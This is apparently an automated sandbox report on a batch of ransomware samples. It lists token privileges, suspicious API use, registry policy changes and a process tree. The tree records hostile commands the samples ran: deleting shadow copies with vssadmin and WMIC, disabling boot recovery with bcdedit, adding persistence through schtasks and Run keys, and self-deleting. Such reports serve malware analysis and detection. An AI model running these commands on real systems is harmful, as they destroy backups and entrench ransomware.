wmic.exe Token: SeLoadDriverPrivilege 41420 wmic.exe Token: SeSystemProfilePrivilege 41420 wmic.exe Token: SeSystemtimePrivilege 41420 wmic.exe Token: SeProfSingleProcessPrivilege 41420 wmic.exe Token: SeIncBasePriorityPrivilege 41420 wmic.exe Token: SeCreatePagefilePrivilege 41420 wmic.exe Token: SeBackupPrivilege 41420 wmic.exe Token: SeRestorePrivilege 41420 wmic.exe Token: SeShutdownPrivilege 41420 wmic.exe Token: SeDebugPrivilege 41420 wmic.exe Token: SeSystemEnvironmentPrivilege 41420 wmic.exe Token: SeRemoteShutdownPrivilege 41420 wmic.exe Token: SeUndockPrivilege 41420 wmic.exe Token: SeManageVolumePrivilege 41420 wmic.exe Token: 33 41420 wmic.exe Token: 34 41420 wmic.exe Token: 35 41420 wmic.exe Token: SeDebugPrivilege 5848 Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe Token: SeIncreaseQuotaPrivilege 3724 wmic.exe Token: SeSecurityPrivilege 3724 wmic.exe Token: SeTakeOwnershipPrivilege 3724 wmic.exe Token: SeLoadDriverPrivilege 3724 wmic.exe Token: SeSystemProfilePrivilege 3724 wmic.exe Token: SeSystemtimePrivilege 3724 wmic.exe Token: SeProfSingleProcessPrivilege 3724 wmic.exe Token: SeIncBasePriorityPrivilege 3724 wmic.exe Token: SeCreatePagefilePrivilege 3724 wmic.exe Token: SeBackupPrivilege 3724 wmic.exe Token: SeRestorePrivilege 3724 wmic.exe Token: SeShutdownPrivilege 3724 wmic.exe Token: SeDebugPrivilege 3724 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2792 7zFM.exe 2792 7zFM.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 2416 Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe 2260 Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe 2280 Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe 1168 Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe 2428 Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe 1016 Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe 1608 Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe 2300 Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe 36968 bqsfahnmfxri.exe 35064 WinMail.exe 5708 lpdcqkacfhfo.exe 16804 vmsmqjynx.exe 10452 ojfkrsimvjds.exe 34600 HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe 13716 iexplore.exe 13716 iexplore.exe 47940 IEXPLORE.EXE 47940 IEXPLORE.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3016 wrote to memory of 3048 3016 cmd.exe 36 PID 3016 wrote to memory of 3048 3016 cmd.exe 36 PID 3016 wrote to memory of 3048 3016 cmd.exe 36 PID 3016 wrote to memory of 3048 3016 cmd.exe 36 PID 3016 wrote to memory of 3060 3016 cmd.exe 37 PID 3016 wrote to memory of 3060 3016 cmd.exe 37 PID 3016 wrote to memory of 3060 3016 cmd.exe 37 PID 3016 wrote to memory of 3060 3016 cmd.exe 37 PID 3016 wrote to memory of 1144 3016 cmd.exe 38 PID 3016 wrote to memory of 1144 3016 cmd.exe 38 PID 3016 wrote to memory of 1144 3016 cmd.exe 38 PID 3016 wrote to memory of 1144 3016 cmd.exe 38 PID 3016 wrote to memory of 468 3016 cmd.exe 39 PID 3016 wrote to memory of 468 3016 cmd.exe 39 PID 3016 wrote to memory of 468 3016 cmd.exe 39 PID 3016 wrote to memory of 468 3016 cmd.exe 39 PID 3016 wrote to memory of 2208 3016 cmd.exe 40 PID 3016 wrote to memory of 2208 3016 cmd.exe 40 PID 3016 wrote to memory of 2208 3016 cmd.exe 40 PID 3016 wrote to memory of 2208 3016 cmd.exe 40 PID 3016 wrote to memory of 1580 3016 cmd.exe 41 PID 3016 wrote to memory of 1580 3016 cmd.exe 41 PID 3016 wrote to memory of 1580 3016 cmd.exe 41 PID 3016 wrote to memory of 1580 3016 cmd.exe 41 PID 3016 wrote to memory of 1968 3016 cmd.exe 42 PID 3016 wrote to memory of 1968 3016 cmd.exe 42 PID 3016 wrote to memory of 1968 3016 cmd.exe 42 PID 3016 wrote to memory of 1968 3016 cmd.exe 42 PID 3016 wrote to memory of 1036 3016 cmd.exe 43 PID 3016 wrote to memory of 1036 3016 cmd.exe 43 PID 3016 wrote to memory of 1036 3016 cmd.exe 43 PID 3016 wrote to memory of 1036 3016 cmd.exe 43 PID 3016 wrote to memory of 2204 3016 cmd.exe 44 PID 3016 wrote to memory of 2204 3016 cmd.exe 44 PID 3016 wrote to memory of 2204 3016 cmd.exe 44 PID 3016 wrote to memory of 2204 3016 cmd.exe 44 PID 3016 wrote to memory of 2260 3016 cmd.exe 45 PID 3016 wrote to memory of 2260 3016 cmd.exe 45 PID 3016 wrote to memory of 2260 3016 cmd.exe 45 PID 3016 wrote to memory of 2260 3016 cmd.exe 45 PID 3016 wrote to memory of 2416 3016 cmd.exe 46 PID 3016 wrote to memory of 2416 3016 cmd.exe 46 PID 3016 wrote to memory of 2416 3016 cmd.exe 46 PID 3016 wrote to memory of 2416 3016 cmd.exe 46 PID 3016 wrote to memory of 2280 3016 cmd.exe 47 PID 3016 wrote to memory of 2280 3016 cmd.exe 47 PID 3016 wrote to memory of 2280 3016 cmd.exe 47 PID 3016 wrote to memory of 2280 3016 cmd.exe 47 PID 3016 wrote to memory of 1956 3016 cmd.exe 48 PID 3016 wrote to memory of 1956 3016 cmd.exe 48 PID 3016 wrote to memory of 1956 3016 cmd.exe 48 PID 3016 wrote to memory of 1956 3016 cmd.exe 48 PID 3016 wrote to memory of 1168 3016 cmd.exe 49 PID 3016 wrote to memory of 1168 3016 cmd.exe 49 PID 3016 wrote to memory of 1168 3016 cmd.exe 49 PID 3016 wrote to memory of 1168 3016 cmd.exe 49 PID 3016 wrote to memory of 2052 3016 cmd.exe 50 PID 3016 wrote to memory of 2052 3016 cmd.exe 50 PID 3016 wrote to memory of 2052 3016 cmd.exe 50 PID 3016 wrote to memory of 2052 3016 cmd.exe 50 PID 3016 wrote to memory of 2428 3016 cmd.exe 51 PID 3016 wrote to memory of 2428 3016 cmd.exe 51 PID 3016 wrote to memory of 2428 3016 cmd.exe 51 PID 3016 wrote to memory of 2428 3016 cmd.exe 51 -
System policy modification 1 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System bqsfahnmfxri.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" lpdcqkacfhfo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ojfkrsimvjds.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System hbuuvsjbfrbv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" hbuuvsjbfrbv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System qbqsfahnmfxr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" qbqsfahnmfxr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" bqsfahnmfxri.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System lpdcqkacfhfo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ojfkrsimvjds.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook explorer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1100
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00288.7z"2⤵
- DcRat
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2792
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exeHEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3048 -
C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe"C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:14532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k vssadmin.exe Delete Shadows /All /Quiet5⤵PID:16760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k bcdedit.exe /set {default} recoveryenabled No5⤵PID:16756
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵PID:16744
-
-
-
-
C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exeHEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3060 -
C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exeHEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:38576 -
C:\Users\Admin\Documents\mfxriq.exeC:\Users\Admin\Documents\mfxriq.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:40684 -
C:\Users\Admin\Documents\mfxriq.exeC:\Users\Admin\Documents\mfxriq.exe6⤵
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:33700 -
C:\Windows\system32\cmd.execmd /c ubonw.bat7⤵PID:3292
-
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /For=C: /All /Quiet7⤵
- Interacts with shadow copies
PID:19092
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_+pqnjv.txt7⤵PID:40964
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\HEUR-T~2.EXE >> NUL5⤵
- System Location Discovery: System Language Discovery
PID:32548
-
-
-
-
C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exeHEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe3⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:1144 -
C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exeHEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe4⤵
- Suspicious use of SetWindowsHookEx
PID:34600 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Java" /tr "'C:\Program Files (x86)\Java\java.exe' /startup" /sc MINUTE /f /rl highest5⤵
- DcRat
- Luminosity
- System Location Discovery: System Language Discovery
PID:3764
-
-
C:\Windows\SysWOW64\REG.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Java" /d "cmd /c """start """Java""" """C:\Program Files (x86)\Java\java.exe"""" /f /reg:645⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:25040
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exeTrojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:468
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exeTrojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2208 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exeTrojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe4⤵PID:27940
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.NSIS.Xamyh.agk-625e2c66c2b1e7fb68da887810e453b302beb981e0bcfa8415c076ffb998eb1d.exeTrojan-Ransom.NSIS.Xamyh.agk-625e2c66c2b1e7fb68da887810e453b302beb981e0bcfa8415c076ffb998eb1d.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1580
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exeTrojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1968 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exeTrojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:14428 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe"5⤵
- DcRat
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Drops file in Windows directory
- Modifies Internet Explorer Phishing Filter
- outlook_office_path
- outlook_win_path
PID:5592 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet6⤵
- Interacts with shadow copies
PID:15548
-
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exeTrojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1036 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exeTrojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:40484 -
C:\Windows\qbqsfahnmfxr.exeC:\Windows\qbqsfahnmfxr.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:40412 -
C:\Windows\qbqsfahnmfxr.exeC:\Windows\qbqsfahnmfxr.exe6⤵
- DcRat
- Adds Run key to start application
- Drops file in Program Files directory
- System policy modification
PID:34664 -
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive7⤵PID:2352
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT7⤵
- Opens file in notepad (likely ransom note)
PID:43384
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\_ReCoVeRy_.HTM7⤵PID:40280
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:40280 CREDAT:275457 /prefetch:28⤵PID:40672
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:40280 CREDAT:472069 /prefetch:28⤵PID:26060
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:40280 CREDAT:406541 /prefetch:28⤵PID:10024
-
-
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive7⤵PID:27808
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\QBQSFA~1.EXE7⤵PID:18984
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR1234~1.EXE5⤵
- System Location Discovery: System Language Discovery
PID:31324
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exeTrojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Users\Admin\AppData\Roaming\Siybp\geaw.exe"C:\Users\Admin\AppData\Roaming\Siybp\geaw.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:33452 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵
- Modifies firewall policy service
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
PID:41396
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exeTrojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2260 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exeTrojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:26376 -
C:\Windows\vmsmqjynx.exeC:\Windows\vmsmqjynx.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:16804 -
C:\Windows\vmsmqjynx.exeC:\Windows\vmsmqjynx.exe6⤵
- Adds Run key to start application
PID:38816 -
C:\Users\Admin\Documents\sxain.exeC:\Users\Admin\Documents\sxain.exe7⤵
- System Location Discovery: System Language Discovery
PID:30532 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet8⤵
- Interacts with shadow copies
PID:26988
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR1A23~1.EXE5⤵PID:54964
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exeTrojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2416 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exeTrojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:38476 -
C:\Windows\bqsfahnmfxri.exeC:\Windows\bqsfahnmfxri.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:36968 -
C:\Windows\bqsfahnmfxri.exeC:\Windows\bqsfahnmfxri.exe6⤵
- DcRat
- Adds Run key to start application
- Drops file in Program Files directory
- System policy modification
PID:7860 -
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive7⤵PID:4600
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TRF0B7~1.EXE5⤵PID:5240
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exeTrojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2280 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exeTrojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe4⤵PID:35856
-
C:\Windows\ojfkrsimvjds.exeC:\Windows\ojfkrsimvjds.exe5⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:10452 -
C:\Windows\ojfkrsimvjds.exeC:\Windows\ojfkrsimvjds.exe6⤵
- Adds Run key to start application
- System policy modification
PID:45284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR0CEE~1.EXE5⤵PID:9980
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exeTrojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
